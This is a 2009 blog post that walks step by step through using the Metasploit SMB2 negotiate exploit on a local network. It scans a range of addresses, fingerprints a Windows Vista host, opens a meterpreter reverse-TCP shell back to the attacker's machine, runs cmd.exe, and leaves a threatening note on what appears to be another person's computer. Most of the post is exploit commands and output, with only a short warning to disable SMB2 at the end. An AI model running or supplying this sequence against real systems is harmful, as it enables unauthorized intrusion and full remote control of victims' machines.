Tuesday, October 6, 2009

Testing the new smb2 exploit

Recently I’ve downloaded the metasploit framework 3.3 and tested the new unpatched smb2 exploit in my local network ;-D.

Run the metasploit framework console
[email protected] $ ./msfconsole

Scan the network that has smb2 enabled
msf > use auxiliary/scanner/smb/
msf auxiliary(smb2) > set RHOSTS 192.168.1.1-192.168.1.254
RHOSTS => 192.168.1.1-192.168.1.254
msf auxiliary(smb2) > set THREADS 100
THREADS => 100
msf auxiliary(smb2) > run

[*] 192.168.1.10 supports SMB 2 [dialect 2.2] and has been online for 21 hours
[*] 192.168.1.15 supports SMB 2 [dialect 2.2] and has been online for 43 hours
[*] 192.168.1.111 supports SMB 2 [dialect 2.2] and has been online for 30 hours
[*] 192.168.1.121 supports SMB 2 [dialect 2.2] and has been online for 80 hours
[*] 192.168.1.123 supports SMB 2 [dialect 255.2] and has been online for 10 hours
[*] 192.168.1.197 supports SMB 2 [dialect 255.2] and has been online for 8 hours

Quite a result!. Now check for the Windows version from the selected IP
msf exploit(smb2_negotiate_func_index) > use auxiliary/scanner/smb/version
msf auxiliary(version) > set RHOSTS 192.168.1.15
RHOSTS => 192.168.1.15
msf auxiliary(version) > run

[*] 192.168.1.15 is running Windows Vista Ultimate Service Pack 1 (language: Unknown)
[*] Auxiliary module execution completed

It is Windows Vista. Now we’ll run the exploit to that IP
msf auxiliary(version) > use exploit/windows/smb/smb2_negotiate_func_index
msf exploit(smb2_negotiate_func_index) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(smb2_negotiate_func_index) > set LHOST 192.168.1.46
LHOST => 192.168.1.46
msf exploit(smb2_negotiate_func_index) > set LPORT 5678
LPORT => 5678
msf exploit(smb2_negotiate_func_index) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf exploit(smb2_negotiate_func_index) > exploit

[*] Connecting to the target (192.168.1.15:445)…
[*] Started reverse handler
[*] Sending the exploit packet (854 bytes)…
[*] Waiting up to 180 seconds for exploit to trigger…
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.46:5678 -> 192.168.1.15:52010)

Succeeded! Now I’ve got access to the computer. That’ll give me a full control to the computer
meterpreter > sysinfo
Computer: GREEN
OS : Windows Vista (Build 6001, Service Pack 1).
Arch : x86
Language: ms_MY
meterpreter > execute -f cmd.exe -c -H -i

Process 636896 created.
Channel 2 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\>echo PLEASE DISABLE YOUR SMB2, OR I’LL RETURN > PLEASE DISABLE YOUR SMB2.txt

It is quite a dangerous situation where people are able to get into your computer without you knowing about it. And to get worst, they can get your personal files/folder or spy on you.

If you’re connected to a public wired/wireless network (Starbucks, Old town, or Lab), the recommended solution for the time being is to disable your SMB2. You can get the Microsoft’s released of disabling SMB2 here.

Be not an ignorant or you’ll be in trouble.

No comments:

Post a Comment